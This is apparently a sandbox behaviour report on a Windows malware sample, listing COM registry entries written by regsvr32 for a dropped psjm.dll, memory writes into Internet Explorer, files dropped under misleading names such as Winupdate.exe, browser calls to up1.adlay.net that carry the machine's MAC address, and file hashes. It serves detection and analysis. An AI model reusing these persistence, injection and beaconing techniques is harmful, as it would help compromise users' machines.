Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID\ = "new.myb" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ = "C:\\Windows\\SysWow64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1060 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1060 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 988 wrote to memory of 684 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 684 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 684 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1060 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1060 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1060 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1060 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 1060 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 1060 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 1060 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 1060 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 1060 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 228 wrote to memory of 1468 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 228 wrote to memory of 1468 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 988 wrote to memory of 2360 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 2360 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 2360 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_cnt.php?mac=62-87-14-87-72-27&key=kmj&pid=rain

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:17410 /prefetch:2

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe /s psjm.dll

C:\WINDOWS\SysWOW64\4875\Winupdate.exe

Winupdate.exe

C:\WINDOWS\SysWOW64\4875\Winspss.exe

Winspss.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_pro.php?mac=62-87-14-87-72-27&key=kmj

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:82946 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 up1.adlay.net udp
US 8.8.8.8:53 up1.adlay.net udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 195.177.78.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 17.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 185.178.17.96.in-addr.arpa udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 209.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 128.227.79.178.in-addr.arpa udp

Files

C:\Windows\SysWOW64\psjm.dll

MD5 8cea2d23c693ea6fa8e41ea6d9cc3432
SHA1 e965e000871a0b8e6b206256ddcf7657b13cc931
SHA256 7f486807cae14b4913ed33d7e3fe468d7fb97a4e8ae7b7e281a8226d6f5047a1
SHA512 63ff64ca8736b23f6b23466ddd35efb26dd0fdf1675926ef2c74e608384748b7f445c8711105b52dbfc859bdf67fe0e790f5d0365e0b6bcbb1ed90600b45ae99

C:\Windows\SysWOW64\4875\Winupdate.exe

MD5 addc0dd99f694a8df3caac3fa7c3fda3
SHA1 44d3310c26fba0bab0c679966ca7e26f7333dbc7
SHA256 54203137d5f8dab7b9d47af23d46afd7f8f7a20205d734f30c622167f4a9ac8f
SHA512 8fba70f876e5dd420532335d960dcb9c1af2d056c771410b778b43ca7db898d70f406ef8f1866f8308e95bb63f9cbd4b4f4ebd2a89fa93dd9bb79948f0bd5451

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verBC4B.tmp

MD5 1a545d0052b581fbb2ab4c52133846bc
SHA1 62f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512 bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HT2TD2G4\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee